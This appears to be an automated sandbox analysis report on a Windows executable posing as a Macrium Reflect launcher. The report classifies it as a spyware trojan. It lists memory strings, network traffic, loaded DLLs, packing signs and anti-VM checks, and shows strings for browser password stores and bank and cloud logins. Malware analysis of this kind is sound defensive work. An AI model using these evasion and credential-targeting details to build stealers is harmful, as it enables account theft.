                    Source: BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                    Source: BnJxmraqlk.exe, 00000000.00000003.2200713354.0000000000F20000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                    Source: BnJxmraqlk.exe, 00000000.00000003.2268585286.0000000003D3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                    Source: BnJxmraqlk.exe, 00000000.00000003.2268585286.0000000003D3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                    Source: BnJxmraqlk.exeString found in binary or memory: https://updates.macrium.com/reflect/blank.asphttp:https://updates.macrium.com/InternetConnectionTime
                    Source: BnJxmraqlk.exeString found in binary or memory: https://updates.macrium.com/reflect/v8/languages/get.asp?lang=%s&major=%d&minor=%d&build=%dhttp:http
                    Source: BnJxmraqlk.exe, 00000000.00000003.2279889600.0000000003C18000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2280294712.0000000003C18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
                    Source: BnJxmraqlk.exe, 00000000.00000003.2201474731.0000000003C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: BnJxmraqlk.exe, 00000000.00000003.2201474731.0000000003C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: BnJxmraqlk.exe, 00000000.00000003.2268516884.0000000003C5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.or
                    Source: BnJxmraqlk.exe, 00000000.00000003.2268516884.0000000003C5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                    Source: BnJxmraqlk.exe, 00000000.00000003.2268585286.0000000003D3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
                    Source: BnJxmraqlk.exe, 00000000.00000003.2268585286.0000000003D3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
                    Source: BnJxmraqlk.exe, 00000000.00000003.2268585286.0000000003D3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                    Source: BnJxmraqlk.exe, 00000000.00000003.2279889600.0000000003C18000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2280294712.0000000003C18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49713 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49714 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49716 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49722 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49758 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49767 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49783 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49792 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49819 version: TLS 1.2
                    Source: BnJxmraqlk.exeStatic PE information: invalid certificate
                    Source: BnJxmraqlk.exe, 00000000.00000002.2349737464.00000000003C2000.00000080.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameReflectLauncher.exe@ vs BnJxmraqlk.exe
                    Source: BnJxmraqlk.exe, 00000000.00000002.2350564465.0000000002ECD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs BnJxmraqlk.exe
                    Source: BnJxmraqlk.exeBinary or memory string: OriginalFilenameReflectLauncher.exe@ vs BnJxmraqlk.exe
                    Source: BnJxmraqlk.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: BnJxmraqlk.exeStatic PE information: Section: pbpvjmsi ZLIB complexity 1.021484375
                    Source: BnJxmraqlk.exeBinary string: RAW IDENTIFY DEVICE DATAForceEFISettingsSYSTEM\CurrentControlSet\Control\hivelistBCD0000\efi\system\setupSystemPartitionc:\\DEVICE\H\\\\?\GLOBALROOT\Device\Harddisk%d\Partition%d\HiberbootEnabledSYSTEM\CurrentControlSet\Control\Session Manager\PowerHiberbootEnabledHiberbootDisabledSYSTEM\CurrentControlSet\Control\Session Manager\PowerSoftware\Macrium\Reflect\MIGHiberbootDisabledSOFTWARE\Macrium\Reflect\MIG\StoppedUntilRebootSoftware\Macrium\Reflect\MIGHiberbootEnabledSYSTEM\CurrentControlSet\Control\Session Manager\PowerHiberbootDisabledSoftware\Macrium\Reflect\MIG\%s\drivers\%sreflect.exe_recover_recoverMacriumRebootScheduledkernel32.dllGetProductInfomsinfo32C:\Program Files\Common Files\Microsoft Shared\MsInfo\msinfo32.exe"%s" /nfo "%s"S-1-5-18S-1-5-32-544...Macrium ReflectChanged Block Tracker{452C9F12-83F1-4F22-985B-FDB3C8ABD471}{452C9F12-83F1-4F22-985B-FDB3C8ABD471}{0A68F3F8-73C5-40B6-B57E-AA69683767D0}viBootviBoot{452C9F12-83F1-4F22-985B-FDB3C8ABD590}CBT{F4E99D38-AEE7-4E4E-93D1-6C2094FFA565}MIGImage Guardianv%d.%d.%ddrivers\mrcbt.sys{BA595DA9-69FB-420A-958A-F71880A1D09B}{BA595DA9-69FB-420A-958A-F71880A1D09B}{BA595DA9-69FB-420A-958A-F71880A1D09B}{BA595DA9-69FB-420A-958A-F71880A1D09B}drivers\mrigflt.sysCBT{BA595DA9-69FB-420A-958A-F71880A1D09B}CBT{FEE007F1-8256-4305-A80E-9EDA1D35D2E6}\\.\C:CBTTESTSettingsCBTTESTSettingsFailedCBTTESTFailedCBTTESTV7EnableCBTSettingsV7EnableCBTSettingsMrcbt.sys\\\?\??\\\.\%C:ImagePathSYSTEM\CurrentControlSet\Services\MRCBTsystem32\drivers\mrcbt.sysStartdriversmrcbt.sys\%hu.%hu.%hu\\.\C:%lu.%lu.%lumrcbt.sysSYSTEM\CurrentControlSet\Services\MRCBTdrivers\\\.\C:UpperFiltersSOFTWARE\Macrium\Reflect\CBT\SequencemrcbtSOFTWARE\Macrium\Reflect\CBT\SequencevolsnapmrcbtUpperFiltersDebugLogSystem\CurrentControlSet\Services\mrcbtDebugLogDebugLogDebugLogPath\??\%PROGRAMDATA%\Macrium\mrcbt_debug.log\??\DebugLogPathError generating user tokenError duplicating user token
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@11/2
                    Source: BnJxmraqlk.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: BnJxmraqlk.exe, 00000000.00000003.2202226133.0000000003C30000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2255694526.0000000003C48000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2202067915.0000000003C4C000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2255574030.0000000003C55000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: BnJxmraqlk.exeVirustotal: Detection: 33%
                    Source: BnJxmraqlk.exeReversingLabs: Detection: 31%
                    Source: BnJxmraqlk.exeString found in binary or memory: ENTRY54IsParentProcessTaskSchedulere:\release-reflect-8\image\reflectlauncher\reflectlauncher.cppexplorer.exesvchost.exetaskeng.exedllhost.exeParent process is a scheduled task.Parent process is not a scheduled task.66EXIT68Launching process via the service.77LaunchBackupViaService -lfs -tsReflectService launched reflectbin.exe.109ReflectService did not return a success status, see service logs, status = [%d].118Could not message the service, to request a ReflectBackup launch.124Ensure that the Macrium Reflect Service is configured to auto-start and is running.125To fix this, run Macrium Reflect interactively and this will configure the Macrium Reflect Service.126Reflect backup launched by SYSTEM.136LaunchBackupViaCreateProcess140reflectbin.exe failed signature check.Launched reflectbin.exe.155161reflectbin could not be started.Launching process via ShellExecute.171LaunchBackupViaShellExecute175189196ReflectBackup could not be started.Waiting for reflectbin.exe to finish executing.208WaitForReflectProcessToExit230Could not get exit code for ReflectBin.exe.Could not wait for reflectbin.exe243"\reflectbin.exe"\reflect.exeReflect Launcher is running as [%s].328IsSystemAccountS-1-5-18SOFTWARE\Macrium\Reflect LauncherReflect Launcher354wWinMain -noconsoleLaunch reflectbin.exe [%s].369UseServiceToLaunchReflectBackupAllowUACByPasslaunching processes normally.382Either OS is Windows 10AU+, or the process does not have admin rights.389 -g.xml-e Either OS is pre Windows 10AU, or the process already has admin rights.399Always using service to launch processes.404417Could not attach to parent console.wCONOUT$Not authorised
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile read: C:\Users\user\Desktop\BnJxmraqlk.exeJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeSection loaded: oleacc.dllJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeSection loaded: dxgi.dllJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: BnJxmraqlk.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                    Source: BnJxmraqlk.exeStatic file information: File size 3972448 > 1048576
                    Source: BnJxmraqlk.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x184a00
                    Source: BnJxmraqlk.exeStatic PE information: More than 200 imports for KERNEL32.dll
                    Source: BnJxmraqlk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: E:\release-reflect-8\release\x86\working\reflect.pdb source: BnJxmraqlk.exe
                    Source: Binary string: wntdll.pdbUGP source: BnJxmraqlk.exe, 00000000.00000002.2350564465.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: BnJxmraqlk.exe, 00000000.00000002.2350564465.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeUnpacked PE file: 0.2.BnJxmraqlk.exe.1c0000.0.unpack
                    Source: BnJxmraqlk.exeStatic PE information: real checksum: 0x3d85d6 should be: 0x3d0d5d
                    Source: BnJxmraqlk.exeStatic PE information: section name: pbpvjmsi
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeCode function: 0_3_03C1CF61 push ss; ret 0_3_03C1CF62
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeCode function: 0_3_03C206FB push es; retn 0003h0_3_03C206FE
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeCode function: 0_3_03C206FB push es; retn 0003h0_3_03C206FE
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeCode function: 0_3_03C20601 push es; retn 0003h0_3_03C20602
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeCode function: 0_3_03C20601 push es; retn 0003h0_3_03C20602
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeCode function: 0_3_03C20E01 push cs; retn 0003h0_3_03C20E02
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeCode function: 0_3_03C20E01 push cs; retn 0003h0_3_03C20E02
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeCode function: 0_3_03C1B30A push ecx; retf 0_3_03C1B310
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeCode function: 0_3_03C1CD23 push ss; ret 0_3_03C1CD2A
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeCode function: 0_3_03C206FB push es; retn 0003h0_3_03C206FE
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeCode function: 0_3_03C206FB push es; retn 0003h0_3_03C206FE
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeCode function: 0_3_03C20601 push es; retn 0003h0_3_03C20602
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeCode function: 0_3_03C20601 push es; retn 0003h0_3_03C20602
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeCode function: 0_3_03C20E01 push cs; retn 0003h0_3_03C20E02
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeCode function: 0_3_03C20E01 push cs; retn 0003h0_3_03C20E02
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeCode function: 0_3_03C25628 push esi; retn 0003h0_3_03C2563E
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeCode function: 0_3_00F26D68 pushfd ; retf 0_3_00F26D72
                    Source: BnJxmraqlk.exeStatic PE information: section name: .text entropy: 7.07184336786379
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeSystem information queried: FirmwareTableInformationJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exe TID: 6488Thread sleep time: -180000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exe TID: 2056Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                    Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                    Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                    Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                    Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
                    Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
                    Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                    Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
                    Source: BnJxmraqlk.exe, 00000000.00000003.2295565862.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000002.2349984104.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2349043201.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000002.2349984104.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2349043201.0000000000E8A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                    Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                    Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
                    Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
                    Source: BnJxmraqlk.exe, 00000000.00000003.2254506430.0000000003C7B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
                    Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
                    Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                    Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
                    Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
                    Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                    Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                    Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                    Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                    Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                    Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                    Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
                    Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                    Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                    Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                    Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
                    Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                    Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                    Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
